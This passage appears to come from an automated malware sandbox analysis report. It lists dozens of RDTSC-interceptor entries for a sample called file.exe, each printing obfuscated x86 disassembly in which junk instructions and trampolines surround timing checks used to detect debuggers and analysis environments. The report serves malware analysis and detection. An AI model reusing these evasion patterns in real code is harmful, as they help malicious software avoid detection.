00007F292CD65AACh 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f mov dword ptr [ebp+122D30E3h], ebx 0x00000085 nop 0x00000086 jg 00007F292CD65AB0h 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 pushad 0x00000091 popad 0x00000092 jp 00007F292CD65AA6h 0x00000098 popad 0x00000099 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CFD41 second address: 7CFD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CFD47 second address: 7CFD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEAF1 second address: 7CEAFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEAFB second address: 7CEAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEAFF second address: 7CEB03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF080 second address: 7CF086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF086 second address: 7CF08A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF08A second address: 7CF08E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF08E second address: 7CF09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F292CD152EAh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF09E second address: 7CF0A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF61A second address: 7CF621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF621 second address: 7CF62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F292CD65AA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF77A second address: 7CF786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF786 second address: 7CF7BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F292CD65AB5h 0x00000011 jo 00007F292CD65AA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7BD second address: 7CF7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7C3 second address: 7CF7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F292CD65AB3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7DE second address: 7CF7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF7E3 second address: 7CF7EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D45AD second address: 7D45B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D45B4 second address: 7D45BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4755 second address: 7D4780 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F292CD152E6h 0x00000008 jmp 00007F292CD152F3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F292CD152F2h 0x00000015 jne 00007F292CD152E6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4780 second address: 7D479A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F292CD65AAEh 0x0000000a jl 00007F292CD65AA6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D479A second address: 7D479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4ABA second address: 7D4AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB5h 0x00000007 jnl 00007F292CD65AAEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F292CD65AA6h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4AEC second address: 7D4AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4AF0 second address: 7D4AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4AFC second address: 7D4B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4C70 second address: 7D4C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F292CD65AB4h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4C8B second address: 7D4CA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D41D5 second address: 7D41E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 je 00007F292CD65AA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D550A second address: 7D550F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D550F second address: 7D5515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9CCD second address: 7D9CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9CD3 second address: 7D9CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3B44 second address: 7A3B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3B48 second address: 7A3BAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jng 00007F292CD65AA6h 0x00000010 pop edx 0x00000011 jmp 00007F292CD65AB8h 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F292CD65AA8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push eax 0x00000033 xor ecx, 6966F501h 0x00000039 pop edi 0x0000003a lea eax, dword ptr [ebp+12487865h] 0x00000040 mov dword ptr [ebp+122D58FDh], edi 0x00000046 push eax 0x00000047 js 00007F292CD65AB0h 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A3BAF second address: 78087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F292CD152E8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dx, 583Bh 0x00000028 call dword ptr [ebp+122D2347h] 0x0000002e ja 00007F292CD15315h 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F292CD152EDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4022 second address: 5EFC67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 ja 00007F292CD65AA7h 0x0000000e push dword ptr [ebp+122D169Dh] 0x00000014 mov cx, 1F71h 0x00000018 call dword ptr [ebp+122D2B67h] 0x0000001e pushad 0x0000001f jnl 00007F292CD65AB0h 0x00000025 xor eax, eax 0x00000027 jmp 00007F292CD65AB0h 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 mov dword ptr [ebp+122D318Bh], edi 0x00000036 mov dword ptr [ebp+122D3B33h], eax 0x0000003c mov dword ptr [ebp+122D3442h], eax 0x00000042 cmc 0x00000043 mov esi, 0000003Ch 0x00000048 jng 00007F292CD65AAEh 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 js 00007F292CD65AACh 0x00000058 mov dword ptr [ebp+122D318Bh], ecx 0x0000005e lodsw 0x00000060 cmc 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 jmp 00007F292CD65AACh 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e mov dword ptr [ebp+122D30E3h], ebx 0x00000074 nop 0x00000075 jg 00007F292CD65AB0h 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f pushad 0x00000080 popad 0x00000081 jp 00007F292CD65AA6h 0x00000087 popad 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A40C0 second address: 7A4116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F292CD152EFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jnc 00007F292CD152FCh 0x0000001a jnl 00007F292CD152ECh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4116 second address: 7A4122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4122 second address: 7A4127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4127 second address: 7A4197 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F292CD65AACh 0x00000008 jng 00007F292CD65AA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 je 00007F292CD65AAAh 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f call 00007F292CD65AB4h 0x00000024 jl 00007F292CD65AA9h 0x0000002a pop ecx 0x0000002b mov edx, ecx 0x0000002d call 00007F292CD65AA9h 0x00000032 jg 00007F292CD65ABDh 0x00000038 pushad 0x00000039 jmp 00007F292CD65AB3h 0x0000003e push eax 0x0000003f pop eax 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jns 00007F292CD65AA8h 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4197 second address: 7A419D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A419D second address: 7A41A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A41A1 second address: 7A41C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F292CD152EEh 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F292CD152EAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A41C9 second address: 7A41D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F292CD65AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A41D4 second address: 7A41E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A41E4 second address: 7A41EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A41EA second address: 7A41EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A41EF second address: 7A41F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A41F5 second address: 7A41F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A42B2 second address: 7A42B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4420 second address: 7A444A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F292CD152E6h 0x00000009 jmp 00007F292CD152F8h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A444A second address: 7A444E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A444E second address: 7A4452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4452 second address: 7A4469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F292CD65AA8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4469 second address: 7A4479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4479 second address: 7A447F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A447F second address: 7A4483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4483 second address: 7A44B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F292CD65AB2h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4B40 second address: 7A4B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4F10 second address: 7A4F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4F15 second address: 7A4F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4F1B second address: 7A4F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4F1F second address: 7A4FD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnc 00007F292CD152ECh 0x00000013 jmp 00007F292CD152F0h 0x00000018 popad 0x00000019 nop 0x0000001a jng 00007F292CD152EBh 0x00000020 or dx, 9994h 0x00000025 lea eax, dword ptr [ebp+124878A9h] 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F292CD152E8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 cmc 0x00000046 jmp 00007F292CD152F2h 0x0000004b push eax 0x0000004c jmp 00007F292CD152EBh 0x00000051 mov dword ptr [esp], eax 0x00000054 mov dword ptr [ebp+122D2962h], ecx 0x0000005a lea eax, dword ptr [ebp+12487865h] 0x00000060 mov edx, dword ptr [ebp+122D2D47h] 0x00000066 add cx, B427h 0x0000006b nop 0x0000006c push esi 0x0000006d push ebx 0x0000006e push esi 0x0000006f pop esi 0x00000070 pop ebx 0x00000071 pop esi 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4FD0 second address: 7A4FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4FD4 second address: 7A4FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A4FDA second address: 781515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F292CD65AA6h 0x00000009 jmp 00007F292CD65AB0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F292CD65AA8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edi, 00C88D64h 0x00000031 call dword ptr [ebp+122D194Dh] 0x00000037 pushad 0x00000038 push ebx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b push edi 0x0000003c pop edi 0x0000003d pop ebx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0D5 second address: 7DA0E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0E4 second address: 7DA0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jmp 00007F292CD65AACh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA0F7 second address: 7DA11B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F292CD152E6h 0x00000009 jmp 00007F292CD152EAh 0x0000000e jne 00007F292CD152E6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F292CD152E6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA26F second address: 7DA28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD65AB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA28C second address: 7DA2A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA5A2 second address: 7DA5BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F292CD65AAFh 0x00000009 jnl 00007F292CD65AA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA5BB second address: 7DA5C5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DAA45 second address: 7DAA80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F292CD65AB7h 0x00000010 jng 00007F292CD65AA6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a jns 00007F292CD65AA6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF811 second address: 7DF81F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F292CD152E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF81F second address: 7DF823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF823 second address: 7DF82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DFD80 second address: 7DFD84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DFD84 second address: 7DFD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E019B second address: 7E01DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F292CD65AB6h 0x0000000a pushad 0x0000000b jmp 00007F292CD65AB6h 0x00000010 jl 00007F292CD65AA6h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
